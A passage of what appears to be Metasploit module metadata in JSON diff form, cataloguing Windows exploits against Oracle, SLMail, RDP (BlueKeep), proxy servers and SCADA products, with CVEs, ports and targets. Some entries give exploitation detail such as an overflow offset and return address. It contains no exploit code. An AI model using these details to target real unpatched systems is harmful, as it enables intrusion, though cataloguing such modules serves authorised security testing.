In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.", + "references": [ + "URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/extjob.rb", + "is_install_path": true, + "ref_name": "windows/oracle/extjob", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/osb_ndmp_auth": { + "name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow", + "fullname": "exploit/windows/oracle/osb_ndmp_auth", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-5444", + "OSVDB-51340", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html" + ], + "platform": "Windows", + "arch": "", + "rport": 10000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb", + "is_install_path": true, + "ref_name": "windows/oracle/osb_ndmp_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_arguments": { + "name": "Oracle 8i TNS 
Listener (ARGUMENTS) Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_arguments", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-06-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2001-0499", + "OSVDB-9427", + "BID-2941" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", + "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_arguments.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_arguments", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_auth_sesskey": { + "name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_auth_sesskey", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-10-20", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Oracle. 
When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-1979", + "OSVDB-59110", + "BID-36747", + "URL-http://blogs.conus.info/node/28", + "URL-http://blogs.conus.info/node/35", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Oracle 10.2.0.1.0 Enterprise Edition", + "Oracle 10.2.0.4.0 Enterprise Edition" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_auth_sesskey", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/oracle/tns_service_name": { + "name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow", + "fullname": "exploit/windows/oracle/tns_service_name", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle. 
When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2002-0965", + "OSVDB-5041", + "BID-4845", + "URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", + "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/oracle/tns_service_name.rb", + "is_install_path": true, + "ref_name": "windows/oracle/tns_service_name", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/pop3/seattlelab_pass": { + "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow", + "fullname": "exploit/windows/pop3/seattlelab_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-05-07", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. 
This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all version of Windows and service packs.\n\n The last modification date on the library is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior version of SLMail may also be vulnerable with this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.", + "references": [ + "CVE-2003-0264", + "OSVDB-11975", + "BID-7519" + ], + "platform": "Windows", + "arch": "", + "rport": 110, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT/2000/XP/2003 (SLMail 5.5)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/pop3/seattlelab_pass.rb", + "is_install_path": true, + "ref_name": "windows/pop3/seattlelab_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/postgres/postgres_payload": { + "name": "PostgreSQL for Microsoft Windows Payload Execution", + "fullname": "exploit/windows/postgres/postgres_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-04-10", + "type": "exploit", + "author": [ + "Bernardo Damele A. G. ", + "todb " + ], + "description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\\\data\" where is the\n major.minor version of PostgreSQL). 
UDF DLL's may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.", + "references": [ + "URL-https://web.archive.org/web/20100803002909/http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql" + ], + "platform": "Windows", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/postgres/postgres_payload.rb", + "is_install_path": true, + "ref_name": "windows/postgres/postgres_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/proxy/bluecoat_winproxy_host": { + "name": "Blue Coat WinProxy Host Header Overflow", + "fullname": "exploit/windows/proxy/bluecoat_winproxy_host", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-01-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in a HTTP\n request.", + "references": [ + "CVE-2005-4085", + "OSVDB-22238", + "BID-16147", + "URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinProxy <= 6.1 R1a Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb", + "is_install_path": true, + "ref_name": "windows/proxy/bluecoat_winproxy_host", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/ccproxy_telnet_ping": { + "name": "CCProxy Telnet Proxy Ping Overflow", + "fullname": "exploit/windows/proxy/ccproxy_telnet_ping", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-11", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.", + "references": [ + "CVE-2004-2416", + "OSVDB-11593", + "BID-11666", + "EDB-621" + ], + "platform": "Windows", + "arch": "x86", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP SP0/1 - English", + "Windows XP SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb", + "is_install_path": true, + "ref_name": "windows/proxy/ccproxy_telnet_ping", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/proxypro_http_get": { + "name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow", + "fullname": "exploit/windows/proxy/proxypro_http_get", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-02-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. 
By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2004-0326", + "OSVDB-4027", + "BID-9716" + ], + "platform": "Windows", + "arch": "", + "rport": 3128, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Proxy-Pro GateKeeper 4.7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/proxypro_http_get.rb", + "is_install_path": true, + "ref_name": "windows/proxy/proxypro_http_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/proxy/qbik_wingate_wwwproxy": { + "name": "Qbik WinGate WWW Proxy Server URL Processing Overflow", + "fullname": "exploit/windows/proxy/qbik_wingate_wwwproxy", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-06-07", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. 
By sending malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.", + "references": [ + "CVE-2006-2926", + "OSVDB-26214", + "BID-18312" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinGate 6.1.1.1077" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb", + "is_install_path": true, + "ref_name": "windows/proxy/qbik_wingate_wwwproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/rdp/cve_2019_0708_bluekeep_rce": { + "name": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", + "fullname": "exploit/windows/rdp/cve_2019_0708_bluekeep_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-05-14", + "type": "exploit", + "author": [ + "Sean Dillon ", + "Ryan Hanson", + "OJ Reeves ", + "Brent Cook " + ], + "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is 
crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.", + "references": [ + "CVE-2019-0708", + "URL-https://github.com/zerosum0x0/CVE-2019-0708", + "URL-https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html" + ], + "platform": "Windows", + "arch": "", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic targeting via fingerprinting", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)", + "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb", + "is_install_path": true, + "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Bluekeep" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/rdp/rdp_doublepulsar_rce": { + "name": "RDP DOUBLEPULSAR Remote Code Execution", + "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "Luke Jennings", + "wvu ", + "Tom Sellers", + "Spencer McIntyre" + ], + "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for RDP.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", + "references": [ + 
"URL-https://github.com/countercept/doublepulsar-detection-script" + ], + "platform": "Windows", + "arch": "x64", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Execute payload (x64)", + "Neutralize implant" + ], + "mod_time": "2023-09-15 16:42:03 +0000", + "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb", + "is_install_path": true, + "ref_name": "windows/rdp/rdp_doublepulsar_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "DOUBLEPULSAR" + ], + "RelatedModules": [ + "exploit/windows/smb/smb_doublepulsar_rce" + ], + "Stability": [ + "crash-os-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sage/x3_adxsrv_auth_bypass_cmd_exec": { + "name": "Sage X3 Administration Service Authentication Bypass Command Execution", + "fullname": "exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-07-07", + "type": "exploit", + "author": [ + "Jonathan Peterson ", + "Aaron Herndon" + ], + "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.", + "references": [ + "CVE-2020-7387", + "CVE-2020-7388", + "URL-https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 1818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Command", + "Windows DLL", + "Windows Executable" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/sage/x3_adxsrv_auth_bypass_cmd_exec", + "check": true, + 
"post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/abb_wserver_exec": { + "name": "ABB MicroSCADA wserver.exe Remote Code Execution", + "fullname": "exploit/windows/scada/abb_wserver_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-05", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2019-5620", + "OSVDB-100324", + "ZDI-13-270", + "URL-https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": 12221, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ABB MicroSCADA Pro SYS600 9.3" + ], + "mod_time": "2021-03-17 15:58:21 +0000", + "path": "/modules/exploits/windows/scada/abb_wserver_exec.rb", + "is_install_path": true, + "ref_name": "windows/scada/abb_wserver_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/advantech_webaccess_dashboard_file_upload": { + "name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload", + "fullname": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", 
+ "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-05", + "type": "exploit", + "author": [ + "rgod", + "Zhou Yu <504137480@qq.com>", + "sinn3r " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.", + "references": [ + "CVE-2016-0854", + "ZDI-16-128", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Advantech WebAccess 8.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/advantech_webaccess_webvrpcs_bof": { + "name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow", + "fullname": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2017-11-02", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a 
specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.", + "references": [ + "ZDI-17-938", + "CVE-2017-14016", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" + ], + "platform": "Windows", + "arch": "", + "rport": 4592, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/citect_scada_odbc": { + "name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow", + "fullname": "exploit/windows/scada/citect_scada_odbc", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-11", + "type": "exploit", + "author": [ + "KF ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.", + "references": [ + "CVE-2008-2639", + "BID-29634", + "OSVDB-46105", + "URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability", + "URL-http://www.auscert.org.au/render.html?it=9433", + "URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 20222, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Citect32.exe v5.21 NT4", + "Citect32.exe v5.21 2K/XP", + "Citect32.exe v5.41-r0 NT4", + "Citect32.exe v5.41-r0 2K/XP", + "Citect32.exe v6.0-r0 2K/XP", + "CiExceptionMailer.dll v5.42 on XP Sp2 or SP3", + "CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2", + "CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3", + "CiExceptionMailer.dll v6.10 
on XP Sp2 or SP3", + "CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3", + "CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1", + "CiExceptionMailer.dll v5.50-r0 XP SP2", + "CiExceptionMailer.dll v5.50-r0 2003 Server", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/citect_scada_odbc.rb", + "is_install_path": true, + "ref_name": "windows/scada/citect_scada_odbc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/codesys_gateway_server_traversal": { + "name": "SCADA 3S CoDeSys Gateway Server Directory Traversal", + "fullname": "exploit/windows/scada/codesys_gateway_server_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-02-02", + "type": "exploit", + "author": [ + "Enrique Sanchez " + ], + "description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.", + "references": [ + "CVE-2012-4705", + "OSVDB-90368", + "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 1211, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal S3 CoDeSyS < 2.3.9.27" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb", + "is_install_path": true, + "ref_name": "windows/scada/codesys_gateway_server_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/scada/codesys_web_server": { + "name": "SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow", + "fullname": 
"exploit/windows/scada/codesys_web_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-02", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Celil UNUVER", + "TecR0c ", + "sinn3r ", + "Michael Coppola" + ], + "description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.", + "references": [ + "CVE-2011-5007", + "OSVDB-77387", + "URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt", + "EDB-18187", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "CoDeSys v2.3 on Windows XP SP3", + "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/codesys_web_server.rb", + "is_install_path": true, + "ref_name": "windows/scada/codesys_web_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/daq_factory_bof": { + "name": "DaqFactory HMI NETB Request Overflow", + "fullname": "exploit/windows/scada/daq_factory_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. 
This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.", + "references": [ + "CVE-2011-3492", + "OSVDB-75496", + "URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01" + ], + "platform": "Windows", + "arch": "", + "rport": 20034, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/daq_factory_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/daq_factory_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/delta_ia_commgr_bof": { + "name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow", + "fullname": "exploit/windows/scada/delta_ia_commgr_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-07-02", + "type": "exploit", + "author": [ + "ZDI", + "t4rkd3vilz", + "hubertwslin" + ], + "description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. 
This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.", + "references": [ + "CVE-2018-10594", + "BID-104529", + "ZDI-18-586", + "ZDI-18-588", + "EDB-44965", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01" + ], + "platform": "Windows", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "COMMGR 1.08 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/delta_ia_commgr_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/diaenergie_sqli": { + "name": "DIAEnergie SQL Injection (CVE-2024-4548)", + "fullname": "exploit/windows/scada/diaenergie_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-05-06", + "type": "exploit", + "author": [ + "Michael Heinzl", + "Tenable" + ], + "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. 
